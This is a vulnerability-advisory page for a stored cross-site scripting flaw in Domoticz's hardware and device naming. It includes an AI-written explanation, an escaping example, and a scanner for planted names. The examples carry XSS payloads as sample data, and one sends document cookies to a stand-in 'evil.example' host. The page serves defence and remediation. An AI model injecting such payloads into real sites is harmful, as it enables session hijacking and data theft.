VYPR
Medium severity · 4.8 · NVD Advisory · Published Mar 25, 2026 · Updated Apr 1, 2026

CVE-2026-1001

Description

Domoticz versions prior to 2026.1 contain a stored cross-site scripting vulnerability in the Add Hardware and rename device functionality of the web interface that allows authenticated administrators to execute arbitrary scripts by supplying crafted names containing script or HTML markup. Attackers can inject malicious code that is stored and rendered without proper output encoding, causing script execution in the browsers of users viewing the affected page and enabling unauthorized actions within their session context.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Domoticz versions prior to 2026.1 contain a stored XSS vulnerability allowing admin users to inject arbitrary scripts via crafted hardware or device names.

Overview

Domoticz versions prior to 2026.1 are affected by a stored cross-site scripting (XSS) vulnerability in the Add Hardware and rename device functionality of the web interface. The root cause is improper output encoding of user-supplied names, allowing script or HTML markup to be stored and later rendered in the browser of users viewing the affected page [1][2].

Exploitation

An authenticated administrator can supply crafted names containing malicious script or HTML markup when adding hardware or renaming a device. This stored payload is then executed in the browsers of other users (including administrators) who visit the affected pages. The attack requires authenticated access with administrative privileges, but does not require any special network position or additional authentication [2].
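
The bug class above, as an added example that is not Domoticz code: a stored name written into table markup by string concatenation (the vulnerable pattern) beside the same row rendered with output encoding. The `idx`/`Name` record shape and the crafted name are constructed for the example, not taken from the project.

```javascript
// Added example, not Domoticz code. Models the bug class on this page: a
// user-supplied hardware/device name inserted into HTML without output
// encoding, beside the encoded rendering a fixed UI would use.

// Encode the five characters that let text break out of an HTML text node
// or attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the stored name is concatenated straight into markup,
// so a name such as <img src=x onerror=...> becomes a live element.
function renderDeviceRowUnsafe(device) {
  return `<tr><td>${device.idx}</td><td>${device.Name}</td></tr>`;
}

// Hardened rendering: every untrusted field is encoded at the point it is
// written into HTML, so the same name is displayed literally.
function renderDeviceRowSafe(device) {
  return `<tr><td>${escapeHtml(device.idx)}</td><td>${escapeHtml(device.Name)}</td></tr>`;
}

// Lists the element names a browser would see in a fragment: only a literal
// "<" starts a tag, so encoded text never contributes one.
function tagNames(html) {
  return Array.from(html.matchAll(/<\/?([a-zA-Z][\w-]*)/g), (m) => m[1].toLowerCase());
}

// Constructed payload in the shape of a renamed device (the idx/Name fields
// are an assumption about the device record, not taken from Domoticz).
const CRAFTED_DEVICE = { idx: "7", Name: "<img src=x onerror=alert(document.cookie)>" };

console.log("unsafe:", renderDeviceRowUnsafe(CRAFTED_DEVICE), tagNames(renderDeviceRowUnsafe(CRAFTED_DEVICE)));
console.log("safe:  ", renderDeviceRowSafe(CRAFTED_DEVICE), tagNames(renderDeviceRowSafe(CRAFTED_DEVICE)));
```

In a DOM-based UI the equivalent fix is to assign names with `textContent` (or jQuery's `.text()`) rather than `innerHTML` (`.html()`); either way the encoding happens at the sink, at the moment the name is written into the page, not when it is stored.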

Impact

Successful exploitation enables an attacker to execute arbitrary scripts in the context of the victim's session, leading to unauthorized actions such as modifying system settings, exfiltrating sensitive data, or performing other actions within the victim's session context. The vulnerability is classified as medium severity with a CVSS v3 score of 4.8 [1].

Mitigation

The vulnerability is fixed in Domoticz version 2026.1, released on March 25, 2026. Users are advised to update immediately to the latest version to remediate the issue [1]. No workarounds are available for unpatched versions; because planting a payload requires administrator credentials, keeping the set of administrator accounts small and their credentials protected limits who can inject one until the upgrade is applied.
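
A check a practitioner would want alongside the upgrade, as an added example that is not Domoticz code: scan the stored hardware and device names for HTML markup, which would indicate a payload planted while the instance was unpatched. The response shape (`{ result: [{ idx, Name, ... }] }`) is an assumption about the Domoticz JSON API, and the sample response is constructed.

```javascript
// Added example, not Domoticz code. Flags stored hardware or device names that
// carry HTML markup, the indicator for the stored-XSS payloads this advisory
// describes. The response shape ({ result: [{ idx, Name, ... }] }) is an
// assumption about the Domoticz JSON API, and the sample data is constructed.

const SAMPLE_HARDWARE_RESPONSE = {
  status: "OK",
  title: "Hardware",
  result: [
    { idx: "1", Name: "Motherboard sensors" },
    { idx: "2", Name: "Living room <script>fetch('//evil.example/?c=' + document.cookie)</script>" },
    { idx: "3", Name: "Garage \"door\" & lights" },
    { idx: "4", Name: "Alarm if temp < 5" },
    { idx: "5", Name: "Hall &lt;img src=x onerror=alert(1)&gt;" },
  ],
};

// A name is suspicious if it contains a tag opener, an entity that a second
// decode would turn into one, or a javascript: URL. A plain "<" followed by a
// space or digit (as in "temp < 5") is left alone to limit false positives.
function hasMarkup(name) {
  return /<\s*\/?[a-zA-Z!]/.test(name)
    || /&(#x?[0-9a-f]+|lt|gt|quot);/i.test(name)
    || /javascript\s*:/i.test(name);
}

// Returns the idx/Name pairs worth reviewing from one API response.
function findNamesWithMarkup(response) {
  const rows = Array.isArray(response.result) ? response.result : [];
  return rows
    .filter((r) => typeof r.Name === "string" && hasMarkup(r.Name))
    .map((r) => ({ idx: r.idx, Name: r.Name }));
}

console.log(findNamesWithMarkup(SAMPLE_HARDWARE_RESPONSE));
```

To run it against a live instance, feed `findNamesWithMarkup` the parsed JSON of the hardware list and of the device list in turn (the exact `json.htm` query parameters for those lists are not given on this page and should be taken from the Domoticz API documentation for the installed version). Flagged names should be renamed after the upgrade and treated as a sign that the page had already been visited by an attacker-controlled administrator.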

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products (2)

  • Domoticz/Domoticz, 2 versions
    • cpe:2.3:a:domoticz:domoticz:*:*:*:*:*:*:*:* range: <2026.1
    • (no CPE) range: <2026.1

Patches (0)

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References (2)

News mentions (0)

No linked articles in our index yet.